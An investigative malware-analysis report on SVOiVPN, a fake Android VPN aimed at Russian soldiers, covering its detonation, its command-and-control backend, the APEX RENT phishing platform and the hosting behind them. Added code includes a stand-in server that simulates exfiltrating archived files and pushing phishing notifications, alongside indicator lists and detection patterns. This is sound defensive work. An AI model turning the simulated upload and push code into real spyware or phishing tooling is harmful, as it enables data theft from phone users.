We downloaded a free VPN that is being handed to Russian soldiers, installed it on a test phone in a sealed, offline lab, and watched it work. It connected. It tunneled traffic. In every visible way it behaved like the privacy tool its tagline promised: "Бесплатный VPN-сервис для участников СВО," a free VPN service for participants of the "special military operation."

Then it reached into the phone's storage, copied the files sitting in the WhatsApp and Telegram folders, packed them into an archive, and uploaded them to a server its operator controls. The last thing it logged was a small green checkmark: "Archive uploaded ✅." Moments later that same server pushed a notification back to the phone, displaying text we had written and wired to open any web page we chose.

The app is called SVOiVPN. It is not a VPN. It is spyware, aimed at the soldiers of a state that is, at this moment, working to make sure they cannot communicate any other way.

This is the story of what it is, the criminal business it belongs to, and the bulletproof-hosting network it runs on. It is also, just as important, the story of the things we could not prove.

The lure

To understand why a fake VPN works as bait for Russian soldiers, you have to understand what Russia has done to their phones.

Across 2025 and into 2026, the Russian state made working, private communication simultaneously essential and illegal for its own people. It criminalized the advertising of VPNs and blocked roughly 460 of them; it fined users for merely searching banned content; it throttled Telegram and, by February 2026, cut off WhatsApp outright [1–6]. In their place it pushed MAX, a state "national messenger" that carries no end-to-end encryption, is wired into the FSB's surveillance plumbing, and, per a 2026 reverse-engineering analysis, can tell when a device is running a VPN [7][8]. Then the irony that opened the door: Russian troops were reportedly ordered to stop using MAX at the front as too insecure for combat, a directive carried by the independent outlet Mediazona and by pro-war military channels, and denied by the Kremlin [9].

Russian soldiers live on Telegram, for orders, for coordinates, for the daily mechanics of staying alive. Stripped of it, ordered off it, and told the official substitute was unsafe for combat, they were left to buy their own phones and source their own circumvention tools through unvetted channels. A "free VPN for SVO participants" dangles exactly the thing the state insists they need and forbids them from having. Russia's own censorship manufactured the demand this app exists to exploit.

How Russia manufactured the demand

Russia manufactures the demand, 2025 to 2026

Criminalize the alternatives
  Jul to Sep 2025: VPN ads banned, searches fined (effective 1 Sep 2025); MAX state messenger made mandatory (1 Sep 2025)
  Jan 2026: roughly 460 VPNs blocked
Cut the messengers
  10 Feb 2026: Telegram throttled
  12 Feb 2026: WhatsApp blocked
The gap opens
  23 Feb 2026: MAX reportedly called too insecure for the front (Kremlin denies)
  Then: a free "VPN for SVO participants" appears

Fig 1. The censorship sequence that created a captive, desperate market for circumvention tools among Russian frontline soldiers.

The app

The fake-VPN landing page in Russian flag colors, headed 'Бесплатный VPN-сервис для участников СВО' (a free VPN service for participants of the SVO), with green 'connected' VPN mockups on a tablet and phone and an Android download button
Fig 2. The lure. svoivpn[.]cfd presents itself as a free VPN service "for participants of the SVO," complete with a working-looking tunnel and an Android-only download. Captured 2026-05.

The lure lives at svoivpn[.]cfd, a landing page styled in Russian-flag colors, branded "СВОЙVpn" and tagged "Быстрый VPN" (Fast VPN). The name is a pun: СВОЙ reads both as СВО, the military operation, and as свой, one's own. The page offers an Android-only download. We pulled the APK (SVOiVPN.apk, package com.sdocument.app). VirusTotal returned 0 of 66 detections; the file had never been submitted before. Static analysis told us what it was built from:

Buried in the code was the address it phones home to: api[.]equinoxharbgrp[.]com, a domain dressed up as a Leicester, UK "financial calendar" company.

Following it home

The operator made a mistake. The command-and-control domain was Cloudflare-fronted, but an unauthenticated endpoint leaked the real server, 64.188.98[.]201, hosted at SERV.HOST GROUP in Frankfurt, and on that server the operator had left Apache directory listing enabled. The entire backend was exposed: at least eighteen PHP scripts across eight directories, including VPN management, a push-notification system, user management, file-exfiltration storage, an APK build pipeline, and debug tools.

An Apache open directory listing titled 'Index of /api' on the SVOiVPN command server, exposing folders and PHP scripts including files, push, vpn, logs.php, delete_by_ip.php and delete_logs_by_device.php
Fig 3. The OPSEC failure. An open Apache directory listing on the SVOiVPN C2 exposes the entire /api/ backend: the exfiltration store (files/), the push-tasking endpoint (push/), per-victim telemetry (logs.php), and anti-forensics scripts (delete_by_ip.php, delete_logs_by_device.php). Captured 2026-06-19.

One file decided the case. vpn_schema.sql, the database schema, showed that the app stores each client's WireGuard private key on the server. In a legitimate WireGuard setup that key is generated on the device and never leaves it; the server needs only the client's public key to bring the tunnel up. Any VPN operator sees plaintext where the tunnel terminates, so a VPN is always an act of trust in its operator; what the stored private key adds is that this operator can also impersonate the client to any peer, and has kept, in a database table, the one secret whose entire purpose is to stay on the phone. The tunnel is not protection; it is a wiretap by design. An admin panel, embedded inside the app itself through an Android WebView, completed the picture: a dashboard the operator manages from the same app the victims installed.
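The key-handling argument above, as an added example that is not code from the app or from the investigation: a pure-Python X25519 (RFC 7748) shows what a legitimate WireGuard enrollment sends (only the public key), what a schema review should flag, and what an operator who also holds the client's private key can compute. The schema in the block is constructed to the shape the article describes; its table and column names are assumed.

```python
"""Why a WireGuard client's private key belongs on the phone, not in a server table.

Added example, not code from the app or from the investigation. Pure-Python
X25519 (RFC 7748) so it runs offline; the schema below is constructed to the
shape the article describes and its table and column names are assumed.
"""
import os
import re

P = 2**255 - 19   # Curve25519 field prime
A24 = 121665      # (A - 2) / 4 for the Montgomery form


def _cswap(swap, a, b):
    # swap is 0 or 1. Python ints are not constant-time; this is a demo, not a library.
    d = swap * (a ^ b)
    return a ^ d, b ^ d


def _clamp(scalar):
    k = bytearray(scalar)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")


def x25519(scalar, point):
    """Montgomery ladder from RFC 7748 section 5; returns the 32-byte u-coordinate."""
    k = _clamp(scalar)
    x1 = int.from_bytes(point, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        swap ^= kt
        x2, x3 = _cswap(swap, x2, x3)
        z2, z3 = _cswap(swap, z2, z3)
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3, z3 = (da + cb) ** 2 % P, x1 * (da - cb) ** 2 % P
        x2, z2 = aa * bb % P, e * (aa + A24 * e) % P
    x2, x3 = _cswap(swap, x2, x3)
    z2, z3 = _cswap(swap, z2, z3)
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


BASEPOINT = (9).to_bytes(32, "little")


def public_key(private):
    return x25519(private, BASEPOINT)


def generate_keypair(rand=os.urandom):
    private = rand(32)
    return private, public_key(private)


def client_enrollment(client_private):
    """What a legitimate client sends when it registers: its public key, nothing else."""
    return {"wg_public_key": public_key(client_private).hex()}


def static_dh(own_private, peer_public):
    """The static-static Diffie-Hellman both WireGuard peers mix into the handshake."""
    return x25519(own_private, peer_public)


# Constructed, assumed schema in the shape vpn_schema.sql is described as having:
# a per-client private-key column next to the public one.
LEAKED_SCHEMA = """
CREATE TABLE vpn_clients (
  id INT PRIMARY KEY,
  device_id VARCHAR(64),
  wg_private_key CHAR(44),
  wg_public_key CHAR(44)
);
"""
PRIVATE_KEY_COLUMN = re.compile(r"\b\w*priv(?:ate)?_?key\w*\b", re.I)


def private_key_columns(sql):
    """Schema review check: every column name that looks like a stored private key."""
    return sorted({m.group(0) for m in PRIVATE_KEY_COLUMN.finditer(sql)})


def operator_can_act_as_client(stored_private, client_public, peer_private, peer_public):
    """With the client's private key the operator reproduces the client's identity and
    the client's static DH with any peer: it can complete a handshake as that client."""
    same_identity = public_key(stored_private) == client_public
    same_secret = static_dh(stored_private, peer_public) == static_dh(peer_private, client_public)
    return same_identity and same_secret
```

The point is mechanical once you run it: the stored copy regenerates the client's public identity and the client's static DH with any peer, which is why the key's only legitimate home is the device. The schema check is deliberately crude; it is the grep a reviewer runs on a leaked vpn_schema.sql before reading further.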

That told us where it phones home and what it can do. The next step was to watch it do it.

Detonation

Static analysis tells you what an app is built to do. To see what it does, you run it, carefully. We detonated the sample on a hardware-accelerated Android emulator inside a fully network-isolated environment, pointed not at the operator's live server but at a stand-in of our own, and seeded the test device with nothing but uniquely-marked decoy files. Nothing it sent could reach the operator; nothing it stole was real.

It behaved exactly as designed. On launch it swept the device's photos, downloads, and documents, and, pointedly, the files in the WhatsApp and Telegram media folders, packed them into a scraped_data archive, and uploaded it to /api/files/upload.php, reporting each step back to the panel: "Archive uploaded ✅." Every decoy we planted came back out the other side. The exfiltration the leaked schema had only implied was now something we had watched happen.

SVOiVPN exfiltration and push-redirect channel

Exfiltration pipeline (confirmed in detonation):
  Victim phone (SVOiVPN installed) -> scrapeMessengerFiles / scrapePublicMedia / scrapeLocation* -> scraped_data*.zip -> POST /api/files/upload.php -> C2 backend (SERV.HOST, Frankfurt)
Push-tasking channel:
  C2 backend -> GET /api/push/poll.php -> PushResponse with actionUrl -> high-priority notification (operator title and body) -> tap opens operator-chosen URL
Fig 4. The exfiltration pipeline (crimson) was confirmed end-to-end in detonation: scrape, zip, upload to the C2. The push channel (gold) lets the operator send any phone a notification whose tap opens a chosen URL, a remote phishing weapon inside a "VPN." *The location scraper is present and was attempted at runtime, but the emulator returned no GPS fix, so we confirmed the intent, not a captured coordinate.

Then the detonation surfaced a capability the code had only hinted at. The push-notification endpoint, push/poll.php, is not the benign feature its name suggests. The server can return a list of "pushes," each carrying a title, a body, and, the important part, an actionUrl. For each one, the app raises a high-priority notification with the operator's text and wires the tap to open that URL directly. When we fed our stand-in server a crafted push, the test phone displayed it on cue: operator-chosen title, operator-chosen body, operator-chosen link.

That turns the spyware's notification system into a remote phishing weapon. The operator can push any infected phone a convincing, urgent message (a fake "security alert," an "expired subscription," a counterfeit government notice) and route the victim's tap anywhere: a credential-harvesting page, a malicious APK, a payment form. It runs from the server, needs no app update, and can be retargeted at will. A fake VPN that already reads a soldier's traffic and steals their files can also, on command, put an attacker-chosen page in front of them and dress it up as a system notification.
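A stand-in for the operator's server, of the kind the detonation above was pointed at, as an added example that is neither the investigation's tooling nor the operator's code. It accepts the upload endpoint and serves the poll endpoint named in the article, checks that only marked decoys arrive, and hands the sample an operator-style push. The JSON field names (pushes, title, body, actionUrl), the form field name (archive) and the {"status": "ok"} reply are assumptions; the real backend's formats were not published here.

```python
"""Stand-in C2 sink for detonating an exfiltration-and-push Android sample offline.

Added example; not the operator's backend and not the investigation's tooling.
The endpoint paths are the ones named in the article. The push JSON fields
("pushes", "title", "body", "actionUrl"), the upload form field ("archive") and
the {"status": "ok"} reply are assumptions; the real formats were not published.
"""
import io
import json
import re
import threading
import urllib.request
import zipfile
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

DECOY_MARKER = b"DECOY-7f3a9c"  # constructed tag seeded into every planted file


def build_push(title, body, action_url):
    # One operator-chosen push: notification text plus the URL its tap opens.
    return {"title": title, "body": body, "actionUrl": action_url}


def parse_upload(content_type, body):
    """Split a multipart body into file parts and inspect each as a zip archive."""
    m = re.search(r'boundary="?([^";]+)"?', content_type or "")
    records = []
    for part in body.split(b"--" + m.group(1).encode()) if m else []:
        if b"\r\n\r\n" not in part:
            continue
        head, data = part.split(b"\r\n\r\n", 1)
        fn = re.search(rb'filename="([^"]+)"', head)
        if not fn:
            continue
        if data.endswith(b"\r\n"):
            data = data[:-2]
        name, members, hits = fn.group(1).decode(errors="replace"), [], 0
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    members.append(info.filename)
                    hits += zf.read(info).count(DECOY_MARKER)  # only marked decoys should arrive
        except zipfile.BadZipFile:
            pass
        records.append({"filename": name, "size": len(data), "members": members, "decoy_hits": hits,
                        "is_scraped_data": bool(re.fullmatch(r"scraped_data.*\.zip", name))})
    return records


class SinkState:
    def __init__(self):
        self.uploads, self.push_queue, self.lock = [], [], threading.Lock()


class SinkHandler(BaseHTTPRequestHandler):
    state = None  # bound per server in start_sink

    def log_message(self, *args):  # keep the sample's chatter out of stdout
        pass

    def _reply(self, code, obj):
        data = json.dumps(obj).encode()
        self.send_response(code)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_POST(self):
        if self.path != "/api/files/upload.php":
            return self._reply(404, {"error": "unknown endpoint"})
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        records = parse_upload(self.headers.get("Content-Type", ""), body)
        with self.state.lock:
            self.state.uploads.extend(records)
        self._reply(200, {"status": "ok"})

    def do_GET(self):
        if not self.path.startswith("/api/push/poll.php"):
            return self._reply(404, {"error": "unknown endpoint"})
        with self.state.lock:  # hand queued pushes out exactly once
            pushes, self.state.push_queue = self.state.push_queue, []
        self._reply(200, {"pushes": pushes})


def start_sink(host="127.0.0.1", port=0):
    state = SinkState()
    server = ThreadingHTTPServer((host, port), type("Bound", (SinkHandler,), {"state": state}))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, state


def make_client_upload(files):
    """Constructed stand-in for what the sample sends: scraped_data*.zip as multipart."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, content in files.items():
            zf.writestr(path, content)
    b = "StandInBoundary"
    head = (f'--{b}\r\nContent-Disposition: form-data; name="archive"; '
            f'filename="scraped_data_test.zip"\r\nContent-Type: application/zip\r\n\r\n')
    return f"multipart/form-data; boundary={b}", head.encode() + buf.getvalue() + f"\r\n--{b}--\r\n".encode()


def run_detonation_demo():
    """Upload a decoy archive, queue one push, poll it back; returns what the sink saw."""
    server, state = start_sink()
    base = "http://%s:%d" % server.server_address
    try:
        ctype, body = make_client_upload({"WhatsApp/Media/IMG-0001.jpg": DECOY_MARKER + b" planted photo",
                                          "Telegram/docs/orders.pdf": DECOY_MARKER + b" planted document"})
        req = urllib.request.Request(base + "/api/files/upload.php", data=body,
                                     headers={"Content-Type": ctype}, method="POST")
        with urllib.request.urlopen(req) as r:
            status = json.load(r)["status"]
        with state.lock:
            state.push_queue.append(build_push("Security alert", "Confirm your account", "https://example.invalid/login"))
        with urllib.request.urlopen(base + "/api/push/poll.php?device=test") as r:
            pushes = json.load(r)["pushes"]
        return {"upload_status": status, "uploads": list(state.uploads), "pushes": pushes}
    finally:
        server.shutdown()
        server.server_close()
```

Bind it on an interface the isolated emulator can reach and point the lab's DNS for the C2 hostname at it; nothing else should route out. The decoy-marker count is the check that matters: an archive with zero hits means the sample picked up something you did not plant, and the isolation needs a second look before anything else does.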

One honest limit

The app's location-scraping code is present, and at runtime it tries to collect GPS, but our emulator's location services would not feed it a fix, so we confirmed the intent and the attempt, not a captured coordinate. We say so rather than imply more.

The Android notification shade on the isolated test device showing a 'СВОй-VPN: Running in background' notification as the spyware persists
Fig 5. SVOiVPN running as a persistent background service on the isolated test device during detonation, the point at which it began sweeping the phone's storage. Captured 2026-06-20.

The business behind it

SVOiVPN is not a lone app. It is plugged into a criminal enterprise.

A second domain in the same infrastructure, withhatetoapi[.]cc, hosts a public documentation portal for a phishing-as-a-service platform that calls itself APEX RENT ("APEX API v1.1.4"). The docs describe a complete fraud toolkit: eighteen integrated email mailers, an SMS sender, two PDF-receipt generators, templates for a hundred consumer brands across twenty countries, a team-and-affiliate model with API keys, and a checker_balance flag that makes a phishing page ask a victim for their bank balance.

The APEX RENT documentation portal (docs.withhatetoapi.cc) open in the ANY.RUN interactive sandbox, branded 'APEX Docs / Документация / V1.1.4' and 'POWERED BY APEX RENT', with the sandbox flagging 'Malicious activity' and 'phishing'
Fig 6. The product. The public APEX RENT documentation portal (docs[.]withhatetoapi[.]cc), self-branded "APEX API v1.1.4" and "POWERED BY APEX RENT," fronts a phishing-as-a-service platform with eighteen mailers, a hundred brand templates, and a checker_balance flag. Here it renders inside the ANY.RUN interactive sandbox, which flags it as malicious phishing. Captured 2026-05.

In the taxonomy of phishing-as-a-service, that places APEX RENT in a specific lane, and we should be careful not to overstate it. There is no sign in the documentation of the real-time multi-factor interception that defines the premium tier, the platforms that hijack live login sessions. What APEX RENT competes on instead is breadth, the signature of high-volume consumer fraud, a close cousin of the Russian-language Telegram-bot scam factories that Group-IB tracks as Classiscam and ESET as Telekopye [10][11]. What is notable is less the technique than the packaging: a versioned REST API, affiliate keys, a documentation portal. The scam economy now ships its product the way a software startup would. APEX RENT is phishing with a product roadmap.

How does the fake VPN connect to it? Through shared bulletproof hosting and a handful of converging tells. svoivpn[.]cfd sits on the same server as a roughly 116-domain Telegram-phishing cluster; the APEX Telegram channels openly market the host that carries all of it; the spyware's command server and the phishing platform share a small, distinctive code convention (the same log_type field). Together that is enough to place SVOiVPN and APEX RENT inside the same operation with reasonable confidence. It is not enough to prove a single individual runs both: the connective tissue is a shared landlord, and a bulletproof host serves many tenants. We return to that gap below.

Fig 7. The ecosystem. The SVOiVPN spyware and its C2 (red), the Shinomiya bulletproof origin and the Telegram-phishing cluster (gold), the APEX RENT platform (blue), and the sanctioned bulletproof neighborhood (purple). Solid edges are observed or high-confidence; dashed edges are medium-confidence inferences; the dotted red edge marks the one link we could not confirm: whether the bulk "Cluster A" domains belong to APEX RENT at all.

The thread we could not close

For the record: the thread we first pulled, a templated batch of phishing domains we call Cluster A, turned out to be the loosest one. We could not confirm those bulk domains belong to APEX RENT at all; the only observed redirect into the platform came from a single, separate brand-verification domain. The investigation's spine is the spyware, not the domains we started from, and we leave that link open rather than collapse it into a tidier story.

The operator and the neighborhood

The trail to the operator runs not through the C2 but through the distribution site. svoivpn[.]cfd resolves to its own origin, 87.120.107[.]209, a different server and network from the SERV.HOST box behind the C2, and that IP belongs to an autonomous system, AS215428, operating as Shinomiya Hosting: a bulletproof-hosting reseller (formerly "SapDedic") that markets dedicated servers in Finland and Germany and advertises on Lolz.live, one of the largest Russian-language criminal forums. Its public RIPE registration names a Ukrainian national, Mykyta Skorobohatko, in Shostka, Sumska Oblast, near the Russian border.

Here precision matters, and we keep it. That Skorobohatko is the registrant of the hosting is an observation, drawn from a public record. That the same person operates APEX RENT and SVOiVPN, rather than merely renting out the bulletproof hosting they run on, is an inference, supported by the convergence of services but not independently confirmed; the registration itself could be genuine, co-opted, or fabricated.

The network the registrant runs sits in bad company. The Qurium Media Foundation's investigation into the Doppelganger Russian disinformation operation names AS215428 directly [12], alongside the autonomous systems of a bulletproof-hosting constellation (Netshield, DpkgSoft, SERV.HOST) that fans out from Aeza, a Russian bulletproof host the U.S. Treasury sanctioned in July 2025 [13], and from Stark Industries, sanctioned by the EU weeks earlier [14][15][16]. This is the sharpest version of a careful caveat: the operator's own network materially hosts Russian state-aligned operations, but as a landlord, not, on the evidence, as an author. The connection to sanctioned infrastructure is infrastructural, not operational. What it does establish is that the neighborhood the soldiers' data flows into is itself a target of coordinated Western sanctions.

The stakes

In this war, the data this app steals is not an abstract privacy harm. A frontline soldier's geolocation and the documents in their Telegram are fire-mission inputs. Russia's own Ministry of Defense, after a HIMARS strike killed scores of newly mobilized troops at Makiivka on New Year's Day 2023, blamed the dead soldiers' mass use of mobile phones for giving away their position [17]. A RUSI analysis traced the November 2023 strike on Ukraine's 128th Mountain Assault Brigade to the compromise of a single soldier's Signal account [18]. Both armies now treat a soldier's phone signal as a lethal liability, and both have restricted frontline phone use because of it.

It is worth being clear that SVOiVPN's targeting is not, in fact, unusual. It drops into a documented 2025–2026 pattern of Android spyware aimed at Russian soldiers: the trojanized Alpine Quest mapping app (Doctor Web, April 2025) [19], and the romance-lure SiribClone campaign and its SafeLoveStealer implant (The Record, June 2026) [20], both of which, like ours, harvest soldiers' messenger data and geolocation, and both of which remain unattributed.

That word is the one to sit with. Every comparable campaign against Ukrainian soldiers (Sandworm's Infamous Chisel, the GRU's Signal-device-linking, the fake artillery and army apps) has been firmly pinned on Russian military intelligence by government and vendor reporting [21–24]. The campaigns against Russian soldiers, this one included, have been attributed to no one, though it is worth noting that the two precedents above were documented by Russian security vendors, who are unlikely to name their own state. The asymmetry of public attribution is real even so. Symmetry of tactics is not symmetry of proof, and we resist the temptation to supply the missing attribution.

"Symmetry of tactics is not symmetry of proof. We can show you the machine, who it is aimed at, and what one tap costs. We will not invent the sponsor the evidence does not name."

What we proved, and what we didn't

We ran the question of who is behind this through a formal Analysis of Competing Hypotheses, now spanning thirty-two pieces of evidence across four scenarios. The leading explanation (a Russian-speaking, Ukrainian-registrant cybercriminal and bulletproof-hosting reseller, operating for profit in the mold of the Classiscam scam economy) carries zero inconsistencies; the runtime behavior we confirmed, indiscriminate bulk theft plus a built-in fraud-and-redirect channel, is the shape of profit-driven crime, not the selective collection of an intelligence service. We put our confidence at roughly 70 to 80 percent. What keeps it short of certainty is the one thing infrastructure analysis cannot settle: whether this individual operates the spyware or merely resells the hosting it runs on, and whether the soldier-targeting carries any motive beyond money.

Fig 8. The honest connection-strength matrix. Each link is graded Observation, Inference (high), Inference (medium), or Open. The spyware-to-C2 chain is observed; the operator's identity and the Cluster A–to–APEX RENT link are the weakest joints, and we grade them as such.

We are also careful about novelty, because it is easy to overclaim. We are not the first to see this infrastructure: withhatetoapi[.]cc had been scanned roughly a hundred times and flagged as a possible threat in automated feeds since February 2026, months before we looked. What we did not find is any published analysis that identifies it as a phishing-as-a-service platform, names it "APEX RENT," or connects it to SVOiVPN; and the spyware's command server, by contrast, had never been scanned at all. Our contribution is the identification and the linkage, not the discovery of a domain.

The withhatetoapi.cc platform domain rendered in the ANY.RUN sandbox, now showing a Cloudflare 'Warning: Suspected Phishing' interstitial stating the website has been reported for potential phishing
Fig 9. Flagged, not hidden. By 2026-06-21, withhatetoapi[.]cc sits behind a Cloudflare "Suspected Phishing" interstitial: the platform was visible to automated detection long before we named it. Captured 2026-06-21 (ANY.RUN).

And we cannot tell you how many soldiers installed it. Only its operator can: the victim count lives in the very database we chose not to mine. The signals we can see point to a small, low-profile operation, not a mass campaign: a marketing footprint of a few hundred subscribers, a sample no one else had submitted, infrastructure that flew under the radar. The story's weight is not in a headcount. It is that a working spyware machine is aimed at frontline soldiers, where even a handful of compromised phones is a lethal liability, and we can show you the machine, who it is aimed at, and what one tap costs.

We believe that intellectual honesty about what remains unconfirmed makes the confirmed findings stronger, not weaker.

Detection and indicators

All indicators are defanged. Treat the domains and IPs below as hostile, and do not transact with the named sanctioned hosts.

Infrastructure
  Fake-VPN distribution: svoivpn[.]cfd
  APEX RENT platform: withhatetoapi[.]cc; TDS: traffic[.]withhatetoapi[.]cc (returns 403 to non-browser clients); docs: docs[.]withhatetoapi[.]cc
  SVOiVPN C2: equinoxharbgrp[.]com (api. and panel. subdomains)
  Shinomiya origin: 87.120.107[.]209, AS215428, Finland
  C2 origin: 64.188.98[.]201, SERV.HOST GROUP, AS207957, Frankfurt

SVOiVPN malware
  SHA-256: 29b42cf018b81e6d09b886ecfa97093680776257ec132ce89aff4b7a81ff77d7
  Package: com.sdocument.app
  Signer: fa0f2a2dcf974b428842c28f05e91d4641fde50e (Android debug certificate)
  VirusTotal: 0 / 67 (undetected as of 2026-06-20)

SVOiVPN C2 endpoints
  Exfiltration: /api/files/upload.php (multipart, scraped_data*.zip)
  Telemetry: /api/logs.php (per-victim; carries log_type)
  Push / redirect: /api/push/poll.php (actionUrl tasking)

Cluster A domain patterns (attribution to APEX RENT is OPEN)
  Fingerprint .icu: ^[a-z]{2}\d{2,3}-\d{2,3}\.icu$
  secure-* .icu / .com: ^secure-[a-z]\d{3,4}\.(icu|com)$
  Caveat: the secure-* pattern is also used by unrelated actors; verify registrar and registration timing before acting.

Telegram
  APEX RENT: @Apex2Rent, @apexhelper, @apexmailerinfo, @ApexDomainBot, @ApexHost_Bot
  SVOiVPN / hosting: @svojvpn, @svojvpn_bot, @shinomiya_com, @shinomiya_robot, @shinomiya_sup
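The indicators above applied to constructed inputs, as an added example that is not the investigation's tooling. It exact-matches the hostile hosts and IPs, pattern-matches Cluster A, and refuses to promote a secure-* hit past "weak" unless the analyst supplies corroborating registrar and registration-window values (an assumed policy; the article names the check, not the values). The proxy-log format and every log line and WHOIS record in the block are constructed.

```python
"""Apply the indicators above to constructed inputs.

Added example, not the investigation's tooling. Indicators are the ones listed
above, re-fanged for matching. The corroboration rule for secure-* domains is an
assumed analyst policy: registrar names and a registration window are inputs the
analyst supplies, not values the article gives. The proxy-log format, every log
line and every WHOIS record below are constructed.
"""
import re
from datetime import date

HOSTILE_HOSTS = {
    "svoivpn.cfd": "fake-VPN distribution",
    "api.equinoxharbgrp.com": "SVOiVPN C2",
    "panel.equinoxharbgrp.com": "SVOiVPN C2 panel",
    "withhatetoapi.cc": "APEX RENT platform",
    "traffic.withhatetoapi.cc": "APEX RENT TDS",
    "docs.withhatetoapi.cc": "APEX RENT docs",
}
HOSTILE_IPS = {"87.120.107.209": "Shinomiya origin", "64.188.98.201": "SVOiVPN C2 origin"}
C2_PATHS = {"/api/files/upload.php": "exfiltration", "/api/logs.php": "telemetry",
            "/api/push/poll.php": "push tasking"}
FINGERPRINT_ICU = re.compile(r"^[a-z]{2}\d{2,3}-\d{2,3}\.icu$")
SECURE_STAR = re.compile(r"^secure-[a-z]\d{3,4}\.(icu|com)$")

# Constructed, assumed corroboration inputs an analyst would fill in from their own
# registrar and timing review of the confirmed cluster domains.
CLUSTER_REGISTRARS = ("RegistrarX",)
CLUSTER_WINDOW = (date(2026, 2, 1), date(2026, 4, 1))
SAMPLE_WHOIS = {"registrar": "RegistrarX", "created": date(2026, 3, 1)}
SAMPLE_WHOIS_OTHER = {"registrar": "SomeOtherRegistrar", "created": date(2024, 9, 9)}


def classify_domain(domain, whois=None, cluster_registrars=(), window=None):
    """Return (verdict, reason). whois is {"registrar": str, "created": date} or None;
    cluster_registrars and window=(first, last) are the analyst's corroboration inputs."""
    d = domain.lower().rstrip(".")
    if d in HOSTILE_HOSTS:
        return "hostile", HOSTILE_HOSTS[d]
    if FINGERPRINT_ICU.match(d):
        return "cluster-a-candidate", "fingerprint .icu pattern (link to APEX RENT is OPEN)"
    if SECURE_STAR.match(d):
        corroborated = (whois is not None and window is not None
                        and whois["registrar"] in cluster_registrars
                        and window[0] <= whois["created"] <= window[1])
        if corroborated:
            return "cluster-a-candidate", "secure-* pattern, registrar and timing match the cluster"
        return "weak", "secure-* pattern is shared with unrelated actors; not corroborated"
    return "clean", "no indicator matched"


# Constructed log format: ts src method host path status [extra key=value ...]
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) (?P<path>\S+) "
                    r"(?P<status>\d{3})(?: (?P<extra>.*))?$")


def scan_proxy_log(lines):
    """Alert on hostile hosts or IPs, and on C2 paths only when the host or IP agrees:
    /api/logs.php on its own is far too generic to alert on."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        host, path, extra = m["host"].lower(), m["path"].split("?", 1)[0], m["extra"] or ""
        dst = re.search(r"\bdst=(\S+)", extra)
        dst_ip = dst.group(1) if dst else None
        reasons = []
        if host in HOSTILE_HOSTS:
            reasons.append(HOSTILE_HOSTS[host])
        if dst_ip in HOSTILE_IPS:
            reasons.append(HOSTILE_IPS[dst_ip])
        if path in C2_PATHS and (host.endswith("equinoxharbgrp.com") or dst_ip in HOSTILE_IPS):
            reasons.append("SVOiVPN " + C2_PATHS[path])
        if re.search(r"scraped_data\S*\.zip", extra):
            reasons.append("scraped_data archive upload")
        if reasons:
            alerts.append({"src": m["src"], "host": host, "path": path, "reasons": reasons})
    return alerts


# Constructed sample. The C2 host is Cloudflare-fronted, so the destination IP of those
# requests is a CDN edge (198.51.100.7 here) and the host name is what has to match.
SAMPLE_LOG = [
    "2026-06-20T10:15:01Z 10.0.0.5 POST api.equinoxharbgrp.com /api/files/upload.php 200 "
    "dst=198.51.100.7 file=scraped_data_1718878501.zip",
    "2026-06-20T10:15:07Z 10.0.0.5 GET api.equinoxharbgrp.com /api/push/poll.php?device=abc 200 dst=198.51.100.7",
    "2026-06-20T10:16:30Z 10.0.0.9 GET intranet.example.test /api/logs.php 200 dst=192.0.2.10",
    "2026-06-20T10:17:02Z 10.0.0.7 GET svoivpn.cfd / 200 dst=87.120.107.209",
]
```

Two design choices carry the caveats from the table. The C2 path names only count when the host or the origin IP agrees, because a generic path such as /api/logs.php appears on countless benign servers; and a secure-* match is never more than "weak" until registrar and registration timing are checked, which is exactly the verification the indicator list asks for before anyone acts on that pattern.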

Methodology

This investigation ran in two phases.

Passive collection and attribution. The infrastructure was mapped entirely from passive and public sources: passive DNS, certificate transparency, ICANN zone files, RDAP/WHOIS, a Shodan survey, static APK decompilation, and third-party sandbox analysis (Joe Sandbox and ANY.RUN), corroborated by external reporting (DecodeCybercrime, Qurium, Krebs on Security) and U.S. Treasury and EU sanctions records. Every C2 detail described above was read from unauthenticated endpoints the operator left publicly exposed; no credentials were bypassed or exploited. Attribution follows the ICD 203 estimative-language standard and a formal Analysis of Competing Hypotheses, with each claim graded by confidence and unconfirmed links labeled as such.

Controlled active analysis. To move key findings from present in the code to observed in behavior, we then conducted two live analyses under strict containment, shielding the origin of our own activity. We rendered the cloaked pages in an anonymized, origin-shielded browser. And we executed the spyware on a hardware-accelerated Android emulator in a fully network-isolated environment (no route to the internet and no path to the operator's servers) with its outbound traffic terminated by a stand-in server under our control, the test device seeded only with uniquely-marked decoy files. The live sample was never run anywhere it could reach the operator, and no real data ever left our control. Where a capability could not be exercised in testing, notably GPS-location collection, we say so rather than imply confirmation.

Sources

  1. Meduza. "No more phone-sharing, VPN ads, or foreign-agent teachers," September 1, 2025. meduza.io.
  2. Meduza. "Putin signs law penalizing online searches for content deemed extremist," July 31, 2025. meduza.io.
  3. Human Rights Watch. "Russia Clamps Down on Online Searches," July 24, 2025. hrw.org.
  4. Izvestia. "Roskomnadzor blocked more than 400 VPN services in 2025," January 22, 2026. iz.ru.
  5. The Moscow Times. "Roskomnadzor tightens restrictions on Telegram as users report disruptions," February 10, 2026. themoscowtimes.com.
  6. CNN Business. "Russia blocks WhatsApp," February 12, 2026. cnn.com.
  7. The Moscow Times. "Everything you need to know about MAX, Russia's state-backed answer to WhatsApp," August 28, 2025. themoscowtimes.com.
